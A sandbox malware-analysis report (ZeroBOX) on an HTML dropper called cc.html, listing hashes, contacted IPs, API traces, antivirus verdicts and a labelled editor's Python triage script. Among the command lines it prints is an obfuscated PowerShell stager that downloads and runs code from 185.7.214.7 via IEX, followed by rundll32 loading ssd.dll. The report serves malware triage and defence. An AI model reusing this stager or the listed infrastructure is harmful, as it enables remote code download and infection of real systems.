Summary | ZeroBOX

cc.html

Tags: Generic Malware, Malicious Library, Antivirus, UPX, Malicious Packer, AntiDebug, DLL, OS Processor Check, PE32, PE File, AntiVM
Category: FILE
Machine: s1_win7_x6402
Started: Jan. 18, 2022, 10:04 a.m.
Completed: Jan. 18, 2022, 10:06 a.m.
Size 10.8KB
Type data
MD5 8f12c9ff33ea9aa35e97faaeb09f63d7
SHA256 c681e3bc032bdcc6923b7d17c1f7ba0fecc80826d9b9f11ebf512183c977b72f
CRC32 7BCB1843
ssdeep 192:aYA6VCkQyw90+qiJ54x7UODA0qJEMKsqBR43Yn+ebOe1uTJpUrH9U3GgVLrcTR6/:aYlUkPoNj5uAODA0qJdXqksOH70ArcT8
Yara None matched

DNS (Name / Response / Post-Analysis Lookup)
mecaglobal.com 198.12.243.55
IP Address Status Action
103.8.26.102 Active Moloch
103.8.26.103 Active Moloch
104.168.155.129 Active Moloch
131.100.24.231 Active Moloch
164.124.101.2 Active Moloch
178.63.25.185 Active Moloch
178.79.147.66 Active Moloch
185.7.214.7 Active Moloch
192.254.71.210 Active Moloch
198.12.243.55 Active Moloch
203.114.109.124 Active Moloch
207.38.84.195 Active Moloch
209.59.138.75 Active Moloch
212.237.17.99 Active Moloch
217.182.143.207 Active Moloch
45.142.114.231 Active Moloch
45.176.232.124 Active Moloch
46.55.222.11 Active Moloch
51.38.71.0 Active Moloch
51.68.175.8 Active Moloch
58.227.42.236 Active Moloch
79.172.212.216 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: IsPublic IsSerial Name BaseType
console_handle: 0x000000000000001b
1 1 0

WriteConsoleW

buffer: True False Process System.ComponentM...
console_handle: 0x0000000000000023
1 1 0

WriteConsoleW

buffer: PS C:\Users\test22\Desktop>
console_handle: 0x000000000000002b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000251970
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b70bd50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b70bd50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b70bd50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b724f30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b724f30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725010
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725010
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725010
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725010
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725390
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725390
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725390
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725010
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725010
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725010
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725240
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725240
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725240
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725240
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725240
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725240
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725240
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725240
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b7257f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b7257f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b7257f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b7258d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b7258d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725940
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725940
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b7258d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b7258d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b7258d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725b70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725b70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725be0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725be0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b74ed30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b74ed30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_request GET http://185.7.214.7/PP91.PNG (suspicious_features: GET method with no useragent header; Connection to IP address)
suspicious_request GET http://mecaglobal.com/qxim/TlDTjlxYAdwU/ (suspicious_features: GET method with no useragent header)
request GET http://185.7.214.7/PP91.PNG
request GET http://mecaglobal.com/qxim/TlDTjlxYAdwU/
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2256
region_size: 3084288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002320000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2256
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002610000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007756d000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077592000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077574000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077592000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc5c5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc5c5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefe0c4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007feff4a1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007755a000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2256
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002a70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefa7c7000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef7019000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002610000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007756d000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077592000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077574000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077592000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc5c5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefe0c4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007feff4a1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007755a000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077592000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2404
region_size: 2166784
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002ad0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2404
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002ce0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007756d000
process_handle: 0xffffffffffffffff
1 0 0
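The table above is long because the same few pages are re-protected over and over; what matters for triage is separating the fresh PAGE_EXECUTE_READWRITE commits in the low heap range (0x02610000 in PID 2256, 0x02ce0000 in PID 2404, both flagged heap_dep_bypass by the sandbox) from the repeated RWX re-protections of pages that were already mapped at 0x775c1000, 0x7756d000 and the 0x7fe... addresses, which sit where a Windows 7 x64 guest maps its system DLLs (an inference from the addresses; the report does not name the modules). The Python below is an editor's example and not part of the ZeroBOX report. It parses records in the report's own layout and produces that per-PID split; the embedded excerpt is copied from the table (five records, with the stack_dep_bypass, stack_pivoted and process_handle lines left out), and the rest of the table can be pasted in unchanged.

```python
"""Triage of the NtAllocateVirtualMemory / NtProtectVirtualMemory rows in this report."""
import re
from collections import defaultdict

# Excerpt of the report's memory-API table (PIDs 2256, 2404 and 456) in the report's own
# layout; stack_dep_bypass, stack_pivoted and process_handle lines are omitted here.
API_LOG = """
NtAllocateVirtualMemory

process_identifier: 2256
region_size: 3084288
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002320000
allocation_type: 8192 (MEM_RESERVE)
1 0 0

NtAllocateVirtualMemory

process_identifier: 2256
region_size: 4096
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002610000
allocation_type: 4096 (MEM_COMMIT)
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
1 0 0

NtAllocateVirtualMemory

process_identifier: 2404
region_size: 4096
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002ce0000
allocation_type: 4096 (MEM_COMMIT)
1 0 0

NtProtectVirtualMemory

process_identifier: 456
heap_dep_bypass: 1
length: 139264
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x00571000
1 0 0
"""

API_NAME = re.compile(r"^(Nt\w+)$")
FIELD = re.compile(r"^(\w+): (.+)$")
TRAILER = re.compile(r"^\d+ \d+ \d+$")  # "Status Return Repeated" closes a record
MEM_COMMIT, MEM_RESERVE, PAGE_RWX, EXEC_BITS = 0x1000, 0x2000, 0x40, 0xF0

def parse_records(text):
    """Split the report's table text into one dict per API call."""
    records, cur = [], None
    for line in map(str.strip, text.splitlines()):
        if (m := API_NAME.match(line)):
            cur = {"api": m.group(1)}
        elif cur and (m := FIELD.match(line)):
            cur[m.group(1)] = m.group(2)
        elif cur and TRAILER.match(line):
            records.append(cur)
            cur = None
    return records

def summarize(records):
    """Per PID: fresh RWX commits/reserves versus executable re-protections of mapped pages."""
    per_pid = defaultdict(lambda: {"rwx_reserve": 0, "rwx_commit": 0, "exec_reprotect": 0,
                                   "reprotect_pages": set(), "dep_bypass_flags": 0})
    for r in records:
        s = per_pid[int(r["process_identifier"])]
        prot = int(r["protection"].split()[0])        # "64 (PAGE_EXECUTE_READWRITE)" -> 64
        if r.get("heap_dep_bypass") == "1":
            s["dep_bypass_flags"] += 1
        if r["api"] == "NtAllocateVirtualMemory" and prot == PAGE_RWX:
            alloc = int(r["allocation_type"].split()[0])
            s["rwx_commit"] += bool(alloc & MEM_COMMIT)
            s["rwx_reserve"] += bool(alloc & MEM_RESERVE)
        elif r["api"] == "NtProtectVirtualMemory" and prot & EXEC_BITS:
            s["exec_reprotect"] += 1
            s["reprotect_pages"].add(int(r["base_address"], 16))
    return dict(per_pid)

if __name__ == "__main__":
    for pid, s in sorted(summarize(parse_records(API_LOG)).items()):
        print(pid, s)
```

On the full table the distinct-page count stays small for PID 2256 even though there are dozens of NtProtectVirtualMemory rows, which is the quickest way to see that most of the noise is the same handful of already-mapped pages being flipped to RWX rather than new code regions appearing.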
file C:\Users\Public\Documents\ssd.dll
file C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/PP91.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
cmdline "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
cmdline powershell -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/PP91.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/PP91.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
filepath: powershell
1 1 0
Cyren VBS/Agent.AIB
Avast SNH:Script [Dropper]
Kaspersky HEUR:Trojan-Downloader.Script.Generic
McAfee-GW-Edition BehavesLike.HTML.ExploitBlacole.lg
Ikarus Trojan.Script
AVG SNH:Script [Dropper]
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 139264
